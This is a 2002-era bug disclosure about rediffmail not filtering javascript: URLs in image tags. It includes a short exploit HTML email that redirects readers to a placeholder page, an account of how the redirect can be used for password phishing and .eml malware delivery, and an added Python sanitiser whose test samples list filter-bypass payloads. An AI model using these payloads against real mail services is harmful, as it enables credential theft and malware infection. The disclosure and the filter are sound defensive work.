I really do not understand why I have been receiving a lot of requests
for hacking rediffmail. This article is NOT intended to help anybody hack
rediffmail (India-based free online email service) or any other email service.
I personally appreciate these free email services and I think they are doing
a great job. The sole purpose of this article is to bring this vulnerability/bug
to the notice of the concerned authorities, as my email to feedback@rediff.co.in
and newhome@rediffmail.com (Sent: Monday, October 28, 2002 8:36 AM, Subject:
Bug in rediffmail) has remained unanswered to date.
BUG: rediffmail.com does not strip JavaScript hidden in <img> tags. If a mail
whose <img> src attribute carries a javascript: URL with redirection code is sent
to a user, the script runs as soon as the user opens the mail, before the message
body is even rendered, and sends the browser to a page of the sender's choosing.
The redirection happens in the same window, so the unsuspecting user has no idea
that the page now in front of him does not belong to rediffmail.com unless he
looks at the URL bar of his browser. (The vector depends on the browser executing
a javascript: URL given as an image source, which the Internet Explorer versions
current at the time, 5.5 and 6, did; the filtering failure is rediffmail's.)
CONSEQUENCES:
1. The page the user is redirected to can be a copy of the rediffmail login
screen, so the user can lose his or her password to the sender. The familiar
"session expired, you need to login again" message is all it takes to make a
user type the password once more.
2. If that page in turn redirects the user to a malformed .eml file, any
executable the sender has Base64-encoded into the .eml file is executed on
the user's machine (on unpatched IE 5.5). That can be a virus, code that
formats the hard drive, a trojan such as Back Orifice, or anything else; the
user is then entirely at the sender's mercy. This second bug is in Internet
Explorer, not in rediffmail, but the user falls prey to it because he was
using this particular email service.
EXPLOIT:
The exploit is a simple HTML email sent to the target account. The HTML can
be written by hand with the source editor in Outlook Express or generated with
any scripting language.
<HTML>
<HEAD></HEAD>
<BODY bgColor=#ffffff>
<IMG src="javascript:window.location='http://www.any.domain.com/any.page.htm'">
<DIV><FONT face=Arial size=3>hi, you would be redirected even
before you get a chance to read this text</FONT></DIV>
</BODY>
</HTML>
FIX:
Rediffmail.com should parse each email and neutralise every occurrence of
"javascript" in the message, for example by replacing it with "java-script"
so that the browser no longer recognises the URL scheme.
A plain substring replacement of that kind is easy to get around, though:
a different letter case, HTML-entity-encoded characters, a tab or newline
inside the word, an event-handler attribute such as onerror=, or another script
scheme such as vbscript: all slip past it. A robust filter parses the HTML and
keeps only allow-listed tags, attributes and URL schemes (http, https, mailto,
cid) in src and href attributes, dropping everything else.
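The allow-list filter below is an added example of the fix just described for the BUG above; it is not rediffmail's code and does not appear in the original article. It uses Python's standard html.parser to rebuild each message keeping only safe URL schemes, and keeps naive_fix(), the substring replacement proposed above, beside it so the two can be compared on constructed sample tags (the page's own <IMG> exploit plus variants). The function names, the allow-list contents and the host www.rediffmail.com in the benign sample are assumptions of this example; www.any.domain.com is the page's own placeholder.

```python
"""Allow-list sanitiser for HTML mail (added example, not rediffmail's code).
Parses each message instead of string-replacing "javascript", and keeps a
naive_fix() next to it to show what the substring approach misses."""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_SCHEMES = {"http", "https", "mailto", "cid"}      # cid: inline MIME parts
URL_ATTRS = {"src", "href", "action", "background", "lowsrc", "dynsrc"}
DROP_TAGS = {"script", "style", "iframe", "object", "applet", "embed",
             "meta", "link", "base"}                      # meta: refresh redirects
SWALLOW_CONTENT = {"script", "style", "iframe", "object", "applet"}
# IE of the 5.5/6 era ignored tab, newline and similar control characters
# inside "javascript:", so remove them before looking at the scheme.
_CTRL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)


def naive_fix(html: str) -> str:
    """The substring replacement proposed in FIX: case- and encoding-sensitive."""
    return html.replace("javascript", "java-script")


def url_is_safe(value: str) -> bool:
    """True for relative URLs (no scheme) and for allow-listed schemes only."""
    m = _SCHEME.match(_CTRL.sub("", value))
    return m is None or m.group(1).lower() in ALLOWED_SCHEMES


class MailSanitizer(HTMLParser):
    """Rebuilds the message from parsed tags, keeping only safe attributes."""

    def __init__(self):
        # HTMLParser decodes entities in attribute values, so
        # src="&#106;avascript:..." reaches _emit() as "javascript:...".
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self._skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        self._emit(tag, attrs, ">")

    def handle_startendtag(self, tag, attrs):
        self._emit(tag, attrs, " />")

    def _emit(self, tag, attrs, close):
        if tag in DROP_TAGS:
            self.dropped.append(tag)
            if tag in SWALLOW_CONTENT:
                self._skip_depth += 1       # drop the element's content too
            return
        if self._skip_depth:                # child of a dropped element
            return
        parts = [tag]
        for name, value in attrs:           # names arrive lower-cased
            if name.startswith("on") or name == "style":
                self.dropped.append(f"{tag}@{name}")
            elif name in URL_ATTRS and value is not None and not url_is_safe(value):
                self.dropped.append(f"{tag}@{name}={value!r}")
            elif value is None:
                parts.append(name)
            else:
                parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + close)

    def handle_endtag(self, tag):
        if tag in SWALLOW_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
        if tag in DROP_TAGS or self._skip_depth:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments (IE conditional comments included), declarations and
    # processing instructions fall through to HTMLParser's no-op handlers.


def sanitize_report(html: str):
    """Returns (clean_html, list of tags/attributes that were removed)."""
    p = MailSanitizer()
    p.feed(html)
    p.close()                               # flush buffered text
    return "".join(p.out), p.dropped


def sanitize(html: str) -> str:
    return sanitize_report(html)[0]


if __name__ == "__main__":
    # Constructed samples: the page's <IMG> exploit plus variants the
    # substring fix does not catch. www.any.domain.com is the page's placeholder.
    redirect = "window.location='http://www.any.domain.com/any.page.htm'"
    samples = [
        f'<IMG src="javascript:{redirect}">',            # the exploit as published
        f'<img src="JavaScript:{redirect}">',            # different case
        f'<img src="java&#9;script:{redirect}">',        # tab inside the scheme
        f'<img src="&#106;avascript:{redirect}">',       # entity-encoded "j"
        f'<img src="http://www.any.domain.com/x.gif" onerror="{redirect}">',
        '<a href="http://www.rediffmail.com/">ok</a> <img src="cid:logo" alt="a &amp; b">',
    ]
    for s in samples:
        clean, dropped = sanitize_report(s)
        print(f"naive : {naive_fix(s)}\nparsed: {clean}\ndropped: {dropped}\n")
```

Running it shows naive_fix() neutering only the first sample, while the parser strips the src attribute (or onerror) from all five hostile variants and leaves the benign anchor and cid: image untouched. The scheme check is done on the decoded attribute value with control characters removed, which is what matters: a "javascript" appearing in a query string of an http: URL is harmless and is kept, while "java&#9;script:" is caught because the parser has already turned the entity into a tab.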